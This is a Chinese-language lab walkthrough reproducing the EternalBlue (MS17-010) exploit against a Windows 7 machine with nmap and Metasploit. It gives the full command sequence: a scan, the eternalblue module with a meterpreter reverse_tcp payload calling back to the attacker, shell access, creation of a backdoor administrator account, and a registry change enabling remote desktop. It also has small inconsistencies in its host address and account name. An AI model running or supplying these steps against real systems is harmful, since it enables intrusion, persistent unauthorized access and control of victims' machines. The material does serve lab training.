永恒之蓝(ms17-010)漏洞复现
复现环境
- 靶机Win7 64位(IP:192.168.123.145)
- 攻击机:kali 64位(IP:192.168.123.5)
复现过程
1.探测靶机端口
使用Nmap对靶机端口服务进行扫描:
1 | root@kali:~/桌面# namp -sS -sV -Pn 192.168.123.145 |
探测到靶机开放445端口,而永恒之蓝利用的就是445端口的smb服务,操作系统溢出漏洞。
2.打开MSF渗透工具
1 | root@kali:~/桌面# msfconsole |
搜索ms17_010漏洞:
1 | search ms17_010 |
3.使用漏洞模块
1 | use exploit/windows/smb/ms17_010_eternalblue |
查看漏洞模块信息:info
设置攻击目标:set RHOST 192.168.1.145
查看可用的攻击payload:show payloads
选择并设置攻击Payload:set payload windows/x64/meterpreter/reverse_tcp
设置接收信息的本地设备:set LHOST 192.168.123.5
最后检查下当前的配置:show options
开始攻击:exploit
攻击成功后。
4.持续攻击(种植后门)
1.显示远程主机系统信息:sysinfo
2.查看用户身份:getuid
3.对远程主机当前屏幕进行截图:screenshot
4.获得shell控制台:shell
上面显示转到C:\Windows\system32目录下,说明已经获得了shell的控制权。
5.进行后门植入(创建新的管理员账户)
1 | net user hacker 123456 /add //在windows 7上创建一个hack的用户,以便下次访问 |
1 | net localgroup administrators hack /add //将hack加入到windows 7的本地管理员组中,以便获得更大权限 |
可以看到,靶机已经创建了用户
同时可以看到,靶机的445端口一直连接着我们的攻击机
1 | REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f |